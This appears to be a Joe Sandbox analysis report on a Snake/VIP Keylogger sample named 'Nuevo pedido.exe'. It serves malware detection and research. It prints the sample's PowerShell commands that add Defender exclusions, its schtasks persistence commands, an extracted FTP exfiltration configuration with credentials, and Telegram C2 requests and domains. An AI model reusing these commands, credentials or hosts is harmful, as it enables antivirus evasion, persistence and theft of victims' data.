Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Nuevo pedido.exe

Overview

General Information

Sample name:Nuevo pedido.exe
Analysis ID:1586800
MD5:b19a7098f74ce79004ffd6a109302ef0
SHA1:206ff16596fc022d321df2687440c7942a3c2d4c
SHA256:1ad584b71b2ebb4fe6418e55f8d261ba662d4ab07e68ff05c1a073580e2419e2
Tags:exeSnakeKeyloggeruser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Nuevo pedido.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\Nuevo pedido.exe" MD5: B19A7098F74CE79004FFD6A109302EF0)
    • powershell.exe (PID: 7500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7940 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7596 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Nuevo pedido.exe (PID: 7748 cmdline: "C:\Users\user\Desktop\Nuevo pedido.exe" MD5: B19A7098F74CE79004FFD6A109302EF0)
    • Nuevo pedido.exe (PID: 7764 cmdline: "C:\Users\user\Desktop\Nuevo pedido.exe" MD5: B19A7098F74CE79004FFD6A109302EF0)
  • QGVhHsAOjb.exe (PID: 7900 cmdline: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe MD5: B19A7098F74CE79004FFD6A109302EF0)
    • schtasks.exe (PID: 8072 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp69D7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • QGVhHsAOjb.exe (PID: 8116 cmdline: "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe" MD5: B19A7098F74CE79004FFD6A109302EF0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "FTP", "Username": "somavip@gdmaduanas.com", "Password": "6JLyf]Kt%D5L", "FTP Server": "ftp://50.31.176.103/"}
SourceRuleDescriptionAuthorStrings
0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x742c:$a1: get_encryptedPassword
      • 0x775b:$a2: get_encryptedUsername
      • 0x723c:$a3: get_timePasswordChanged
      • 0x7345:$a4: get_passwordField
      • 0x7442:$a5: set_encryptedPassword
      • 0x8af5:$a7: get_logins
      • 0x8a58:$a10: KeyLoggerEventArgs
      • 0x86bd:$a11: KeyLoggerEventArgsEventHandler
      0000000E.00000002.4135978280.000000000043A000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 29 entries
          SourceRuleDescriptionAuthorStrings
          14.2.QGVhHsAOjb.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            14.2.QGVhHsAOjb.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              14.2.QGVhHsAOjb.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                14.2.QGVhHsAOjb.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  14.2.QGVhHsAOjb.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2e62c:$a1: get_encryptedPassword
                  • 0x2e95b:$a2: get_encryptedUsername
                  • 0x2e43c:$a3: get_timePasswordChanged
                  • 0x2e545:$a4: get_passwordField
                  • 0x2e642:$a5: set_encryptedPassword
                  • 0x2fcf5:$a7: get_logins
                  • 0x2fc58:$a10: KeyLoggerEventArgs
                  • 0x2f8bd:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 54 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nuevo pedido.exe", ParentImage: C:\Users\user\Desktop\Nuevo pedido.exe, ParentProcessId: 7288, ParentProcessName: Nuevo pedido.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe", ProcessId: 7500, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nuevo pedido.exe", ParentImage: C:\Users\user\Desktop\Nuevo pedido.exe, ParentProcessId: 7288, ParentProcessName: Nuevo pedido.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe", ProcessId: 7500, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp69D7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp69D7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe, ParentImage: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe, ParentProcessId: 7900, ParentProcessName: QGVhHsAOjb.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp69D7.tmp", ProcessId: 8072, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Nuevo pedido.exe", ParentImage: C:\Users\user\Desktop\Nuevo pedido.exe, ParentProcessId: 7288, ParentProcessName: Nuevo pedido.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp", ProcessId: 7596, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Nuevo pedido.exe", ParentImage: C:\Users\user\Desktop\Nuevo pedido.exe, ParentProcessId: 7288, ParentProcessName: Nuevo pedido.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe", ProcessId: 7500, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Nuevo pedido.exe", ParentImage: C:\Users\user\Desktop\Nuevo pedido.exe, ParentProcessId: 7288, ParentProcessName: Nuevo pedido.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp", ProcessId: 7596, ProcessName: schtasks.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-09T16:36:04.683812+010028033053Unknown Traffic192.168.2.449737104.21.16.1443TCP
                  2025-01-09T16:36:07.010759+010028033053Unknown Traffic192.168.2.449743104.21.16.1443TCP
                  2025-01-09T16:36:08.151633+010028033053Unknown Traffic192.168.2.449745104.21.16.1443TCP
                  2025-01-09T16:36:10.374485+010028033053Unknown Traffic192.168.2.449753104.21.16.1443TCP
                  2025-01-09T16:36:11.612850+010028033053Unknown Traffic192.168.2.449758104.21.16.1443TCP
                  2025-01-09T16:36:11.674470+010028033053Unknown Traffic192.168.2.449757104.21.16.1443TCP
                  2025-01-09T16:36:13.987092+010028033053Unknown Traffic192.168.2.449766104.21.16.1443TCP
                  2025-01-09T16:36:16.703376+010028033053Unknown Traffic192.168.2.449774104.21.16.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-09T16:36:01.743141+010028032742Potentially Bad Traffic192.168.2.449733193.122.130.080TCP
                  2025-01-09T16:36:04.123149+010028032742Potentially Bad Traffic192.168.2.449733193.122.130.080TCP
                  2025-01-09T16:36:05.326675+010028032742Potentially Bad Traffic192.168.2.449738193.122.130.080TCP
                  2025-01-09T16:36:06.336230+010028032742Potentially Bad Traffic192.168.2.449740193.122.130.080TCP
                  2025-01-09T16:36:06.461247+010028032742Potentially Bad Traffic192.168.2.449741193.122.130.080TCP
                  2025-01-09T16:36:07.367481+010028032742Potentially Bad Traffic192.168.2.449740193.122.130.080TCP
                  2025-01-09T16:36:08.679997+010028032742Potentially Bad Traffic192.168.2.449747193.122.130.080TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-09T16:36:13.730642+010018100071Potentially Bad Traffic192.168.2.449763149.154.167.220443TCP
                  2025-01-09T16:36:17.745150+010018100071Potentially Bad Traffic192.168.2.449775149.154.167.220443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://anotherarmy.dns.army:8081Avira URL Cloud: Label: phishing
                  Source: http://varders.kozow.com:8081Avira URL Cloud: Label: malware
                  Source: http://aborters.duckdns.org:8081Avira URL Cloud: Label: phishing
                  Source: 14.2.QGVhHsAOjb.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "somavip@gdmaduanas.com", "Password": "6JLyf]Kt%D5L", "FTP Server": "ftp://50.31.176.103/"}
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeReversingLabs: Detection: 44%
                  Source: Nuevo pedido.exeReversingLabs: Detection: 44%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeJoe Sandbox ML: detected
                  Source: Nuevo pedido.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Nuevo pedido.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49734 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49742 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49763 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775 version: TLS 1.2
                  Source: Nuevo pedido.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: btC:\Windows\dll\mscorlib.pdb'w source: QGVhHsAOjb.exe, 0000000E.00000002.4153254455.0000000006AEE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: uindows\hEab.pdbpdbEab.pdb source: QGVhHsAOjb.exe, 0000000E.00000002.4153254455.0000000006AEE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: hEab.pdb source: Nuevo pedido.exe, QGVhHsAOjb.exe.0.dr
                  Source: Binary string: hEab.pdbSHA256 source: Nuevo pedido.exe, QGVhHsAOjb.exe.0.dr
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then jmp 02673CA1h0_2_02673DC0
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then jmp 02673CA1h0_2_026745F9
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then mov ecx, dword ptr [ebp-74h]9_2_02F7F618
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then jmp 02F7F45Dh9_2_02F7F2C0
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then jmp 02F7F45Dh9_2_02F7F4AC
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then mov ecx, dword ptr [ebp-74h]9_2_02F7FA97
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then jmp 06D8D1D0h9_2_06D8CDB8
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then jmp 06D84AADh9_2_06D848D0
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then jmp 06D85436h9_2_06D848D0
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then jmp 06D8CC09h9_2_06D8C958
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06D84413
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06D845F3
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then jmp 06D8F1F1h9_2_06D8EF48
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then jmp 06D8D1D0h9_2_06D8CDA8
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then jmp 06D8FAA1h9_2_06D8F7F8
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then jmp 06D8F649h9_2_06D8F3A0
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then jmp 06D8D1D0h9_2_06D8D0FE
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_06D83DCF
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 4x nop then jmp 050E2F21h10_2_050E3040
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 4x nop then jmp 050E2F21h10_2_050E3879
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 4x nop then mov ecx, dword ptr [ebp-74h]14_2_0305F618
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 4x nop then jmp 0305F45Dh14_2_0305F2C0
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 4x nop then jmp 0305F45Dh14_2_0305F4AC
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeCode function: 4x nop then mov ecx, dword ptr [ebp-74h]14_2_0305FA97

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49775 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49763 -> 149.154.167.220:443
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.4:49779 -> 50.31.176.103:32059
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2009/01/2025%20/%2020:22:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2009/01/2025%20/%2020:42:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                  Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                  Source: Joe Sandbox ViewASN Name: SERVERCENTRALUS SERVERCENTRALUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49747 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 104.21.16.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 104.21.16.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49757 -> 104.21.16.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49758 -> 104.21.16.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 104.21.16.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 104.21.16.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49774 -> 104.21.16.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 104.21.16.1:443
                  Source: unknownFTP traffic detected: 50.31.176.103:21 -> 192.168.2.4:49778 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed.220-Local time is now 10:36. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed.220-Local time is now 10:36. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed.220-Local time is now 10:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 500 allowed.220-Local time is now 10:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
